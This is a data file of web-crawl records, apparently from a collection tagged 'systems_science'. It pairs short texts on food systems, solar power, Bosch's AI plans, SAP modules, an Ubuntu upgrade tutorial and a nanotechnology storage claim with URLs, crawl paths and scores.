researchers aim to solve significant global challenges that span many different fields. This has become even more critical as global challenges such as the COVID-19 pandemic affected daily operations worldwide. Especially, contemporary food systems- the focus of my research- are increasingly globalised, constituting complex networks of multiple actors and multidirectional interlinkages between and organisations at local, national, regional and global levels. Besides, food systems are not isolated from other systems, such as the health systems. These characteristics of contemporary food systems have increased the need for system thinking and more multi- and inter-disciplinary approaches, learning from a wide range of disciplines and the inclusion of knowledge from outside of academia. When different perspectives are brought together in a way that consistently results in a greater understanding that goes beyond divisions, one has a unique chance to restructure own assumptions, gain new insights and be more capable of interpreting information and results, and then the aha moment(s) come!
systems_science
https://adaptiveagriculture.ca/news/poking-a-hole-in-a-lack-of-grain-bin-information-western-producer/
2024-04-13T07:03:11
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816586.79/warc/CC-MAIN-20240413051941-20240413081941-00415.warc.gz
0.956633
199
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__148572057
en
“There’s a sensor that we put between the fan in the bin and that air plenum, and it measures temperature, humidity, and static pressure,” Rogoschewsky said. “The control system controls the heater and connects to a cellphone tower so you can see how that system is working on your phone, with alerts. It also connects to in-bin grain temperature or temperature moisture cables and you can see those readings on your phone as well.” The web application the company developed shows how well the grain is drying down. “They can see their current bin or if they’ve got multiple devices set up or multiple bins set up they can see each bin and the inventory that’s in it, as well as the ongoing temperature, blended air humidity going in the bin. There are also graphs that show how well that fan is drying with or without supplemental heat,” Rogoschewsky said.
systems_science
http://www.ubihealthsciencesresearch.pt/page/bioinformatics-and-biosensors
2020-08-10T10:54:39
s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738674.42/warc/CC-MAIN-20200810102345-20200810132345-00574.warc.gz
0.90026
133
CC-MAIN-2020-34
webtext-fineweb__CC-MAIN-2020-34__0__182757580
en
Bioinformatics is the application of computer technology for the management of biological information. Biological and genetic information can be gathered, stored, analyzed and integrated by computers for further gene-based drug discovery and development. This scientific field is essential for understanding human diseases and identifying new molecular targets for drug discovery by using genomic information. Biosensors are analytical devices which can be used for the detection of an analyte by combining a biological component with a physicochemical detector. Generally, the main purpose of a biosensor is to quickly test a sample for the presence of a target analyte. Biomolecules are generally used as the recognition component for the biosensor.
systems_science
https://aneel.dev/
2023-10-05T03:50:09
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233511717.69/warc/CC-MAIN-20231005012006-20231005042006-00729.warc.gz
0.964572
452
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__78711703
en
Hi, I'm Aneel. I'm a software developer. I've worked on a wide variety of projects, ranging from low level code on obscure graphics processors to large scale data processing across clusters of machines. I've made forays into database access, web development, online games, mobile apps, and devops tooling. I'm comfortable writing code that you hold in your hand and code that runs in the cloud in datacenters around the world. For the last few years, I've been working with a Security team, designing and building features that help keep our customers' data safe. Whether it's Audit Logging for our on-prem customers or Role Based Access Control for our fully-managed cloud offering, I've helped plan the architecture and code it up. I excel at understanding both the business goals and engineering constraints of a project, which lets me translate between domain experts and technical specialists. I communicate in ways that respect my audience, but don't assume they share a particular jargon. Communication is key: sometimes an elegant technical solution doesn't address the right business problem, or the business goals need to be tweaked to reduce technical complexity. I can help find the sweet spots where we can deliver real value. I strive to improve the quality of the codebases I work with, making them more efficient and more comprehensible. I advocate for careful naming, thorough testing, up-to-date documentation, and code reviews. I want to make sure that code that seems obvious to the person who wrote it is also clear to someone who'll read it in the future. That someone is often me. I'm frequently called in to figure out whether an old or complex piece of code does what it's supposed to, so I've learned the value of investing in maintainability. I enjoy working with a diverse, tightly-knit, collaborative team, on projects with broad impact across an organization. I like working with expert peers to design big systems, and find it rewarding to help less experienced engineers get to the core of a problem, and discover the tools that will help them solve it. I currently live in Austin, Texas and am not looking to relocate, but am open to remote work on the right team.
systems_science
https://junise.wordpress.com/2016/12/21/how-to-upgrade-ubuntu-to-the-latest-version-via-terminal/
2018-07-19T11:51:38
s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676590866.65/warc/CC-MAIN-20180719105750-20180719125750-00258.warc.gz
0.882861
357
CC-MAIN-2018-30
webtext-fineweb__CC-MAIN-2018-30__0__103911421
en
If you are running the server version of Ubuntu or choose to not use the GUI, then you can use this tutorial to upgrade your system to the latest version (or the latest LTS version). Although many systems can be upgraded in place without incident, it is often safer and more predictable to migrate to a major new release by installing the distribution from scratch, configuring services with careful testing along the way, and migrating application or user data as a separate step. - Please backup your important datas. - Now update your software package list. sudo apt-get update -y - Now upgrade your packages to available latest version. sudo apt-get upgrade -y - Now use the dist-upgrade command, which will perform upgrades involving changing dependencies, adding or removing new packages as necessary. This will handle a set of upgrades which may have been held back by apt-get upgrade. sudo apt-get dist-upgrade - Now check whether the update-manager-core package is installed or not. sudo apt-get install update-manager-core -y - If you want to upgrade to the latest LTS version or the latest version, you have to do some editing in the file /etc/update-manager/release-upgrades. sudo nano /etc/update-manager/release-upgrades If you want the LTS version, then change Prompt=lts or if wish to the latest normal version, then change Prompt=normal. After editing, press ctrl+x and then y to save & exit the file. - Upgrade the system to the latest version of Ubuntu. This includes a lot of download of packages from the Internet. Give some patience according to your Internet speed.
systems_science
http://www.gladstoneinstitutes.org/scientist/davalos
2015-07-29T13:30:27
s3://commoncrawl/crawl-data/CC-MAIN-2015-32/segments/1438042986444.39/warc/CC-MAIN-20150728002306-00141-ip-10-236-191-2.ec2.internal.warc.gz
0.931931
619
CC-MAIN-2015-32
webtext-fineweb__CC-MAIN-2015-32__0__127720235
en
Dimitrios Davalos, PhD Staff Research Scientist Download a Printable PDF Other Professional Titles Associate Director, Gladstone/UCSF Center for In Vivo Imaging Research (CIVIR) More about Dr. Davalos Dr. Dimitrios Davalos studies the neuro-immune mechanisms that influence the brain’s normal function, homeostatic balance, and structural integrity. He is particularly interested in microglia, the resident immune cells of the brain, the spinal cord and the retina, the three major sites of the central nervous system (CNS). His research aims to determine the cellular and molecular mechanisms through which microglia facilitate neuronal plasticity and brain function in physiology and regulate inflammatory processes when the homeostasis or the integrity of the CNS are pathologically compromised. His ultimate goal is to identify new targets for therapeutic intervention. During his graduate years, Dr. Davalos performed the first in vivo imaging study of microglia, taking advantage of advanced microscopy technologies that allowed him to follow the behavior of individual cells inside the intact living brain, in real time. He demonstrated that microglia continuously survey the intact brain, and can contain small localized injuries within only a few minutes. These findings inspired numerous studies aimed at understanding the mechanisms and the significance of such unexpected microglial abilities for neuronal plasticity, function, and dysfunction. In recent years, Dr. Davalos has been studying microglial responses in the context of disruption of the blood-brain-barrier, a pathological phenomenon that is very common among neurological diseases, such as multiple sclerosis, and stroke. He has also developed and published novel methods for imaging the living brain and spinal cord to follow ongoing biological processes over time. His research combines cutting-edge imaging techniques with molecular, cellular and genetic approaches to study the interactions between blood vessels, neurons, and glia, and to understand how their relationships change between health and disease. Dr. Davalos earned a BSc in biology from the University of Athens in Greece, and a PhD in physiology and neuroscience from New York University. He then joined the laboratory of Dr. Katerina Akassoglou for postdoctoral training at the University of California, San Diego (UCSD), and moved with her to the Gladstone Institute of Neurological Disease in 2008. In 2010, Drs. Akassoglou and Davalos established the Center for In Vivo Imaging Research (CIVIR) at the Gladstone Institutes and the University of California, San Francisco. Dr. Davalos currently serves as the associate director of CIVIR, and is a visiting scientist at the National Center for Microscopy and Imaging Research at UCSD. He reviews for several scientific journals and funding institutions and serves as a member of the pilot grant review committee for the National Multiple Sclerosis Society (NMSS). He has organized two Gordon Research Seminars and has received postdoctoral and young investigator awards from the NMSS, the American Heart Association, and the Race to Erase Multiple Sclerosis Foundation.
systems_science
https://sungreenenergy.co.in/about_solar_energy.php
2024-02-24T21:29:47
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474569.64/warc/CC-MAIN-20240224212113-20240225002113-00889.warc.gz
0.922264
2,312
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__84773982
en
Energy from sun is free and the sun will continue to shine for billions of years to come. While the solar energy is inexhaustible and renewable, its irradiance is environment-friendly. The solar power system does not emit CO2, which is environmentally damaging. In addition, silicon, the raw material in making solar cells, is the second most abundant element in the earth’s crust. Since the solar industry has been developing and the technology is maturing, the PV power systems are efficient for both commercial and residential use. The price of PV systems is also more affordable now due to recent price cuts. In contrast, fossil fuels, as our main sources of energy, are depleting. Our high dependence on fossil fuels is inevitably going to push up their prices continuously until they are used up. Fossil fuels are nonrenewable and environmentally damaging. Recent climate change is in part a consequence from the increased CO2 concentration in the atmosphere caused by burning fossil fuels. Therefore, it is essential for us to seek alternative renewable energy resources for guaranteed energy supply and environmental protection. Solar is the answer. Photovoltaic (PV) effect is the conversion of sunlight energy into electricity. In a PV system, the PV cells exercise this effect. Semi-conducting materials in the PV cell are doped to form P-N structure as an internal electric field. The p-type (positive) silicon has the tendency to give up electrons and acquire holes while the n-type (negative) silicon accepts electrons. When sunlight hit the cell, the photons in light excite some of the electrons in the semiconductors to become electron-hole (negative-positive) pairs. Since there is an internal electric field, these pairs are induced to separate. As a consequence, the electrons move to the negative electrode while the holes move to the positive electrode. A conducting wire connects the negative electrode, the load, and the positive electrode in series to form a circuit. As a result, an electric current is generated to supply the external load. This is how PV effect works in a solar cell. Depending on the system’s connection to the electricity grid, different components are integrated in a PV system. Generally, all the systems include PV modules, wiring, and the associating construction materials. Solar cells are assembled together to form solar modules. Through PV effect, the solar cells capture sunlight and turn it into direct current (DC) electricity. For off-grid system, the DC can be immediately used for DC loads if there is no inverter or the DC can then be directed to an inverter, which converts DC into alternating current (AC) that is suitable for conventional electric appliances. For the off-grid system, excess energy generated from the PV panels is usually stored in batteries, controlled by the charge controller, for use at night when there is no sunlight. An optional backup power such as diesel generator can be installed if electricity from the batteries run out. For grid-tied system, DC is converted into AC to be used on-site or stored for backup if the system includes battery banks. When there is more demand, power can be drawn from the grid. Excess supply of electricity from the PV panels can also be fed back into the grid. This process of drawing and feeding electricity to the grid is monitored by the solar production meter and the export/import meter. Solar modules can be arranged into arrays that are large enough to function as power stations converting sunlight into electrical energy for industrial, commercial, and residential use. Solar modules in smaller configuration can be installed on buildings for residential or commercial use. Solar panels can also be used in remote areas where there is a short supply of electricity or where electricity cannot be delivered such as in space. Depending on the technologies used to produce the PV cell, different manufacturing process is taken place. As mentioned earlier, semi-conducting materials are the fundamental elements in making up a solar cell. By different choice of semiconductors, crystalline silicon in a wafer form, thin films of other materials, and concentrated PV (CPV) are the technologies used. 1. Crystalline silicon (c-Si). Mainstream technology 85-90% market share. There are generally two types of this semiconductor: mono-crystalline silicon and polycrystalline silicon. Polycrystalline is composed of a number of smaller silicon crystals. The multiple crystals create boundaries for electrons resulting in less efficiency comparing to mono-crystalline silicon. However, polycrystalline can be produced at a lower cost than the mono-crystalline and it is used most in the solar industry. Sand is mostly made up of silica. At the first step, silica goes through carbothermic reduction process and become metallurgical grade silicon (MG-Si).The MG-Si then goes through refining and casting scratch process to become poly-silicon. The poly-silicon material goes into two different production process for mono-crystalline silicon and multi-crystalline silicon production For mono-crystalline silicon, the poly-silicon is used for ingot growing either through the Czochralski(CZ) or the Float Zone (FZ) process. For the multi-crystalline silicon, the poly-silicon material is melted and then cast into bricks. The mono-crystalline silicon ingot is then slice into wafers. As for the poly-crystalline silicon, the silicon brick is first diced into bars and then sliced into wafers. Since monocrystalline silicon grows in a cylinder shape, their wafers are not in perfect squares. For both mono and multi-crystalline Silicon, a semiconductor junction is formed by diffusing n-type or p-type onto the top surface of the silicon wafer to form the p-n junction in a solar cell. Depending on the process, it might start out with an n-type waver, followed by a p-type layer. Solar cells are wired together to form a circuit. Contacts are applied to the front and rear of the cell to protect the cells and increase efficiency in absorbing light. With the necessary functions to generate electricity, the solar cells are assembled to form solar modules. The modules are the final solar products that can be arrange in arrays for larger output. In addition, there is a new technology producing quasi mono semiconductors. They have similar appearance and electrical properties to the mono-crystalline silicon. The quasi-mono is produced based on poly-crystalline ingots but mono-crystal seed is used partially in the crystal growth process. 2. Thin film: thin film is an alternative technology that uses less or no silicon in the manufacturing process. The thin film PV cells are constructed by depositing extremely thin layers of the semi-conducting materials onto a low-cost backing such as glass, stainless steel or plastic. A conducting layer is then formed on the front electrical contact of the cell, and a metal layer is formed on the rear contact Different types materials used in thin films are amorphous silicon (a-Si), CIGS/CIS and CdTe. Amorphous silicon (a-Si): most common and developed. It is the non-crystalline form of silicon. The cell structure has a single sequence of p-i-n layers. When exposed to sun, their power output is significantly decreased. A-Si type thin film solar cells are commonly found in calculators. A-Si type thin film is manufactured in 6 steps. First the glass substrate is coated with a TCO (transparent conductive oxide) layer as front contact, followed by P1 laser scribing. Then a layer of a-Si is deposited followed by P2 laser scribing. Then a metal conductive layer is placed as back contact with the relative P3 laser scribing CIGS/ CIS: it is the semiconductor material composed of copper, indium, selenium, and/or gallium. In thin film technology, CIGS has the highest PV conversion efficiency. CIGS/CIS has similar manufacturing process as a-Si thin films. However, as opposed to a-Si thin film, the glass substrate on CIGS/CIS is at the rear instead of the front. In addition, Cds is applied as a buffer layer CdTe: it is formed from cadmium and tellurium. It is usually combined together with cadmium sulfide to form a p-n junction PV cell. the composition is similar to a-Si solar cell with an additional Cds layer for buffer. First Solar is the largest manufacturer. The technology is to build the solar cells into concentrating collectors that use a lens to focus the sunlight onto the cells. As a result, less semi-conducting materials are used for solar cells decreasing material costs while collecting as much sunlight as possible. Efficiencies are in the range of 20 to 30%. There are generally two types of PV systems: off-grid and grid-tied depending on their connection to the utility grid. Off-Grid DC system (without inverter): The DC output is immediately directed to DC loads. Excess power is stored in the battery banks controlled by the charge controller. Common applications of this system are found in RVs, boats, cabins, farm appliances, or rural telecommunication services. A backup generator may be included. Off-grid AC system (with inverter): An inverter is added to this system. The generated energy is directed to the inverter that converts DC to AC electricity for conventional electric appliances. Excess energy is stored in batteries and an optional backup generator can be added. Hybrid system: In this system, another renewable energy generator is added to generate more power. For example, the wind turbine can be added to generate electricity from wind. This system is useful in places where the weather is sunny and windless during summer but cloudy and windy during winter. This system is typically off-grid and the excess energy is stored in batteries. If neither the PV panel nor the wind turbine generates enough electricity, backup power such as a diesel generator can be added to generate the more energy. Grid-tied system (without battery backup). In this system, the generated DC is converted to AC and used on-site. The solar power production is monitored by the solar production meter. If there is an excess energy, the energy can be fed into the electricity grid. If the PV system does not generate enough power because of higher demand, needed energy can be drawn from the grid. This process of drawing or feeding electricity to the grid is monitored by the export/import meter. Grid-tied with battery backup system. In this system, the converted AC is used on-site or stored in batteries. The charge controller monitors the battery capacity and excess energy is stored in the batteries for backup. If the batteries reach their full capacity, the excess energy can be fed into the electricity grid. On the other hand, if the PV system does not generate enough power, needed energy can be drawn from the grid. This process is done automatically through a net metering program.
systems_science
https://connect.springerpub.com/search?query=&f%5B0%5D=content_type%3ABooks&f%5B1%5D=content_type%3APatient+Education&f%5B2%5D=keyword%3Afeeling-state&f%5B3%5D=keyword%3Ahealth+care&implicit-login=true&sigma-token=ES6vptCXky7mJvv16MAAYi70h4qvMFxGUkfwImlN36c&sort_by=date_ppub_facet&page=0&items_per_page=50
2023-03-31T18:57:33
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949678.39/warc/CC-MAIN-20230331175950-20230331205950-00050.warc.gz
0.932436
273
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__48934741
en
This comprehensive textbook contains information on a wide array of topics, including the organization of care, population health, the fundamental challenges of health disparities, health care financing and economics, and health information technology’s role in improving care and protecting privacy. New chapters on public health preparedness and its role in mitigating effects on health and the health system and the medical and social challenges of caring for older adults provide insight into important, ongoing challenges and what those challenges reflect about our system of care. With an increased emphasis on health disparities, population health, and health equity, this textbook includes a timely focus on how social and behavioral determinants influence health outcomes. Students will gain a deeper understanding of public health systems and their societal role and of the economic perspectives that drive health care managers and the system. Thorough coverage of the rapid changes that are reshaping our system, in addition to an evaluation of our nation’s achievement of health care value, will equip students with the critical knowledge they need to enter this dynamic and complex field. The book also includes cutting-edge, evidence-based information on preventive medicine, innovative approaches to control health care costs, initiatives to achieve high-quality and value-based care, and much more from prominent scholars, practitioners, and educators within health care management, public health, population health, health policy, medical care, and nursing.
systems_science
https://enterpriseiotinsights.com/20200116/channels/news/bosch-positions-ai-at-heart-of-factories-and-products
2022-07-03T18:25:56
s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104248623.69/warc/CC-MAIN-20220703164826-20220703194826-00526.warc.gz
0.958788
1,264
CC-MAIN-2022-27
webtext-fineweb__CC-MAIN-2022-27__0__56434995
en
Bosch positions AI next to 5G at heart of industrial change strategy Bosch wants to be an “innovation leader” in AI, it told CES last week. The German industrial giant, one of the manufacturing sector’s most outspoken champions of industrial 5G, is seeking to mainline data in its products and factories, and apply advanced analytics to drive efficiencies in its business and environmental impact. By 2025, every product out of its 270 factories will either contain artificial intelligence or else have been developed or manufactured with the help of it, it declared. The message on industrial AI comes as the company prepares, again, to be among the more notable industrial outfits on the traditional tech circuit in 2020, taking in MWC in late February and Hannover Messe in late April. Bosch set the tone for digital industry in 2019 with its visions about fold-away digital factories and modular assembly, threaded with wireless 5G. It closed 2019 by confirming its application for private 5G licences in Germany had gone to the regulator. It has kicked off 2020 with a clear statement of intent around the complementary role of AI in the industrial space. Bosch has established a new AI training programme, with the intention of making 20,000-odd managers, engineers and developers “AI-savvy” over the next two years. “We must invest not only in artificial intelligence, but in human intelligence as well,” said Michael Bolle, board member at Bosch. Bosch invests €3.7 billion per year in software development, it said. It currently employs around 30,000 software engineers, with 1,000 of them ‘working on AI. The new programme includes guidelines for using AI responsibly. The company has drawn up its own set of “principles” for AI security and sovereignty, with a view to build trust with customers. “Trust is the [measure of] product quality of the digital world,” said Bolle. The company said its interest in AI is to improve technology, only, and not to map human behaviour. People should always remain in control, it said, whether at home or in the factory. “Industrial AI has to be safe, robust, and explainable,” said Bolle. Bosch has said it will invest €100 million in an AI research campus in Tübingen, in Germany, scheduled to open at the end of 2022 with 700 staff, including from external startups and research institutes, as well as from Bosch itself. The new facility will slot into the Cyber Valley setup in Baden-Württemberg, in Germany. Cyber Valley was established in 2016 by ZF Friedrichshafen, Daimler, Porsche, BMW, and Facebook, alongside Bosch, as a joint research venture to bring together partners from industry, academia, and government to drive forward AI research. The AI campus will work with seven other ‘Bosch centres for AI’ (BCAI), which includes two facilities in the US, where research and development of commercial AI techniques has been strongest. The US sites are in Sunnyvale and Pittsburgh. The BCAI venues employ around 250 data scientists in total; they focus on AI in mobility, manufacturing, and agriculture. At CES earlier this month, Bosch showcased a number of AI-inspired products, notably for cars. It introduced new in-car video analytics systems. It has developed a digital sun visor (Virtual Visor; see image) with a transparent LCD display connected to an interior monitoring camera in the vehicle. The camera detects the position of the driver’s eyes, and AI darkens the windshield in response, at the point where the sun dazzles the driver. The LCD also shows 3D driving alerts. And the camera is fixed to detect when the driver is drowsy or looks away from the road, based on their head position, and movement of their gaze and eyelids. The system responds, apparently by assuming temporary charge of the visual inputs and alerting the driver in case of danger. Bosch generated €2 billion of sales in 2019 from driver safety systems. AI will make them even safer, it said, bringing intelligence and responsiveness to assisted braking systems (ABS), electronic stability programmes (ESP), and airbag control units. “In the future, when vehicles are in partially automated driving mode for sections of the journey such as on the freeway, the driver monitoring system will become an indispensable partner: In these situations, the camera will ensure that the driver can safely take the wheel again at any time,” the company said. Bosch is looking to produce lidar sensors for car safety systems, to complement existing radar and camera based systems. “Lidar is the third essential sensor technology,” it said. Its new long-range lidar sensor can detect non-metallic objects at a great distance, such as rocks on the road, it reckons. Meanwhile, Bosch has also deployed AI with its lunchbox-sized SoundSee sensor system, bound for space with NASA’s autonomous flying Astrobee robot, which launched at the end of 2019. The sensor is being used to analyse audio data, routed via ground control, to isolate unusual sounds, and indicate when maintenance is necessary. It said, as well, that AI will play a key role in energy management platforms at its 400 sites across the globe – including all its 270 manufacturing plants – as they switch between energy sources, and the company looks to be carbon neutral by the end of this year (2020). “We’ve already achieved this for our German locations,” said Bolle. Bosch has raised more than €1.5 billion in revenue from the implementation of Industry 4.0 techniques in its own factories, as well as its customers’ factories, during the past four years, it reckons. The company has set an incremental revenue target of €1 billion per annum by 2022 from applying digital-change solutions inside and outside of its own factories.
systems_science
http://nanodesigner.sourceforge.net/
2017-04-24T03:20:17
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917118963.4/warc/CC-MAIN-20170423031158-00537-ip-10-145-167-34.ec2.internal.warc.gz
0.940665
261
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__143401497
en
What is Nanodesigner? The Nanodesigner project is an attempt to create a software platform for research on nanometer sized objects. By objects is meant everything that consists of atoms: molecular motors, biomolecules, a crystal slab... Research encompasses the construction of objects out of atoms within the constraints of the laws of quantum mechanics (not unlike the use of a CAD software package in the design of a building for example) and the simulation of its dynamic behaviour in an attempt to find the properties of the object. In the field of bio-informatics there exists already a lot of software and there is a lot of competition concerning molecular visualisation and simulation tools. There are only a few software packages however that are more general in design and allow to build arbitrary objects consisting of atoms from scratch as is necessary in the field of molecular nanotechnology. Visualizing of those objects is an important aspect of design but the simulation of it's dynamic behaviour to find the physico-chemical properties of this object is paramount. Nanodesigner is going to be one of those, a general multi-purpose tool, as it will have a highly modular design from the start and the user will be able to extend it in any way he or she wants by writing or using plug-ins.
systems_science
https://postboulder.com/a-comprehensive-guide-to-sap-sales-and-distribution-modules/
2024-04-17T05:35:47
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817144.49/warc/CC-MAIN-20240417044411-20240417074411-00246.warc.gz
0.902312
933
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__60382606
en
In the ever-evolving world of business and technology, staying ahead of the competition is imperative. Companies worldwide are continually seeking ways to streamline their operations, enhance customer satisfaction, and improve overall efficiency. One such solution that has revolutionized the way businesses manage their sales and distribution processes is SAP Sales and Distribution (SD) modules. In this comprehensive guide, we will delve into the intricacies of SAP SD, its functionalities, benefits, and how it can be a game-changer for your organization. Understanding SAP Sales and Distribution Modules SAP SD, short for Sales and Distribution, is an integral part of the SAP Enterprise Resource Planning (ERP) system. It is designed to facilitate and optimize various business processes, primarily those related to sales, order management, and distribution. This module covers a wide range of functions, including: 1. Sales Order Management One of the core functions of SAP SD is managing sales orders efficiently. From creating sales orders to order processing and delivery, this module ensures that the entire process is seamless and error-free. Sales teams can easily input orders, check product availability, and provide customers with accurate delivery dates. 2. Pricing and Billing Accurate pricing and billing are crucial aspects of any business. SAP SD provides robust tools for pricing determination, allowing organizations to set up complex pricing structures based on various criteria such as customer groups, geographical locations, or product categories. This ensures that customers are billed correctly, reducing disputes and enhancing customer satisfaction. 3. Inventory Management Efficient inventory management is essential for meeting customer demand while minimizing carrying costs. SAP SD enables real-time tracking of inventory levels, helping businesses optimize stock levels, reduce holding costs, and avoid stockouts. 4. Shipping and Transportation SAP SD streamlines the shipping and transportation processes by integrating with logistics and warehouse management systems. This integration ensures that the right products are shipped to the right customers in the most cost-effective and timely manner. 5. Customer Relationship Management (CRM) Maintaining strong customer relationships is vital for long-term success. SAP SD provides tools for managing customer data, tracking interactions, and analyzing customer behavior. This information is invaluable for creating personalized marketing campaigns and improving customer service. Benefits of Implementing SAP SD Now that we have a clear understanding of the various functions of SAP SD, let’s explore the benefits it offers to organizations: 1. Improved Efficiency SAP SD automates and streamlines many manual processes, reducing the risk of errors and increasing overall efficiency. This translates into faster order processing, quicker deliveries, and happier customers. 2. Enhanced Customer Satisfaction With real-time access to order status and accurate delivery estimates, customers experience a higher level of satisfaction. They can trust that their orders will be fulfilled promptly and accurately. 3. Cost Reduction Efficient inventory management and optimized pricing strategies can significantly reduce operating costs. By minimizing excess inventory and avoiding costly stockouts, organizations can achieve substantial savings. 4. Data-Driven Decision Making SAP SD provides access to a wealth of data related to sales, customer behavior, and market trends. This data empowers businesses to make informed decisions, adapt to changing market conditions, and identify growth opportunities. As businesses grow, their requirements change. SAP SD is highly scalable, allowing organizations to expand their operations seamlessly without major disruptions to their existing processes. Implementing SAP SD in Your Organization While the benefits of SAP SD are evident, implementing this module requires careful planning and execution. Here are some key steps to consider: 1. Needs Assessment Begin by conducting a thorough assessment of your organization’s specific needs and goals. Identify areas where SAP SD can provide the most significant impact. 2. Vendor Selection Choose a reputable SAP implementation partner or vendor with a proven track record. Their expertise will be invaluable in ensuring a successful implementation. Invest in comprehensive training for your staff to maximize the benefits of SAP SD. Well-trained employees will be more efficient in using the system and adapting to new processes. 4. Continuous Improvement SAP SD is not a one-time solution; it requires ongoing maintenance and optimization. Regularly review your processes and adapt them to changing business needs. In conclusion, SAP Sales and Distribution modules offer a comprehensive solution for businesses looking to optimize their sales, order management, and distribution processes. By embracing SAP SD, organizations can improve efficiency, enhance customer satisfaction, and gain a competitive edge in today’s dynamic business landscape.
systems_science
https://jobs4-aerojet-rocketdyne.icims.com/jobs/14376/associate-engineer%2C-systems-operability-%26-analysis/job
2019-01-20T17:19:00
s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583728901.52/warc/CC-MAIN-20190120163942-20190120185942-00373.warc.gz
0.927871
675
CC-MAIN-2019-04
webtext-fineweb__CC-MAIN-2019-04__0__68211678
en
Aerojet Rocketdyne is the preferred provider of high-value propulsion, power, energy, and innovative system solutions. Our products and services have been used in a wide variety of government and commercial applications, including the main engines for the NASA SLS, Atlas and Delta launch vehicles, and missile defense systems including flight research vehicles. Join our team as an Associate Engineer, Systems Operability & Analysis. This entry-level position will be located at our West Palm Beach, FL office. This site operates on a 9/80 work schedule. In this position, the engineer will work with senior engineers within Systems Analysis Engineering to conduct cycle and engine matching analyses to analyze engine data to develop an understanding of component level performance and its relationship to overall engine performance. The engineer will perform these analyses for both steady-state and transient engine operating modes. The engineer will use test data to validate and update system simulations as required to enable accurate predictions of engine operating states. The engineer will work in a team environment to develop digital engine control logic and schedules to support Program development activities. This individual will mentor under the senior engineers to develop the necessary design skills required to analyze and create system designs and will utilize analysis configuration control principles to document results and conclusions. 40% - The systems analyst primarily will perform advanced concept thermodynamic design of liquid rocket engines and/or air-breathing engines to define propulsion cycles that meet functional vehicle requirements. During the development activities of these propulsion systems the systems analyst will primarily conduct performance analyses and evaluate the steady state and transient operation of these propulsion systems. Duties may include evaluation of ground test and flight data to determine engine health and conformance to performance requirements. 40% - Duties will include creating, maintaining and using math models of propulsion systems which characterize the thermodynamic, aerodynamic, fluid dynamic and mechanical operation of these systems. 10% - Propulsion development activities include contributing technical analyses to anomaly investigation and resolution teams. 10% - As required, provide on-site customer technical support for vehicle preparation, launch and post-flight activities. Requires a Bachelor's degree in Mechanical or Aerospace Engineering, or an equivalent combination of education and experience. High academic achievement is preferred (GPA 3.2 or higher). US Citizenship required. Must also be able to obtain and maintain a U.S. Security Clearance at the appropriate level. Must be able to satisfy federal government requirements for access to government information, and having dual citizenship may preclude you from being able to meet this requirement. Work Environment/Physical Requirements: Employees in these positions must possess mobility to work in a standard office setting and to use standard office equipment, including a computer; stamina to sit and to maintain attention to detail despite interruptions; may occasionally lift/carry/push/pull up to 25 pounds; may require minimal walking, climbing, stooping, crouching, and/or bending; and vision to read printed materials and a computer screen, and hearing and speech to communicate in person and over the telephone. May require the ability to travel by air or auto. May require the use of personal protective equipment such as safety glasses, safety shoes, and shop coat. These positions may be expected to work varying shifts and hours to ensure successful operation of activities in the organization. Must be able to travel by air, car or train.
systems_science
http://www.nag.co.za/forums/showthread.php?4899-The-500-000-GB-MP3-Player
2013-06-20T11:06:57
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368711441609/warc/CC-MAIN-20130516133721-00099-ip-10-60-113-184.ec2.internal.warc.gz
0.941059
296
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__166194056
en
Can you even imagine an MP3 player with a 500,000 GB capacity? It?s pretty much beyond belief. The most generous player today can only hold around 40,000 songs ? they?d hardly make a dent on this. The thing is, it could easily happen. Scientists at the University of Glasgow have created a nanotechnology breakthrough that could increase storage capacity by 150,000 times. It could mean 500,000 GB on a single chip and inch square. The Glasgow scientists worked to create the molecule-sized switch that?s at the heart of it all. Professor Lee Cronin at the University of Glasgow said, ?What we have done is find a way to potentially increase the data storage capabilities in a radical way. We have been able to assemble a functional nanocluster that incorporates two electron donating groups, and position them precisely 0.32 nm apart so that they can form a totally new type of molecular switching device. The key advantage of the molecule sized switch is information / transistor density in traditional semi-conductors. Molecule sized switches would lead to increasing data storage to say 4 Petabits per square inch. This breakthrough shows conceptually that this is possible (showing the bulk effect) but we are yet to solve the fabrication and addressing problems. The fact these switches work on carbon means that they could be embedded in plastic chips so silicon is not needed and the system becomes much more flexible both physically and technologically.?
systems_science
http://www.mmjgrobase.com/compliance/
2014-03-09T15:04:37
s3://commoncrawl/crawl-data/CC-MAIN-2014-10/segments/1393999679238/warc/CC-MAIN-20140305060759-00083-ip-10-183-142-35.ec2.internal.warc.gz
0.914787
272
CC-MAIN-2014-10
webtext-fineweb__CC-MAIN-2014-10__0__152170271
en
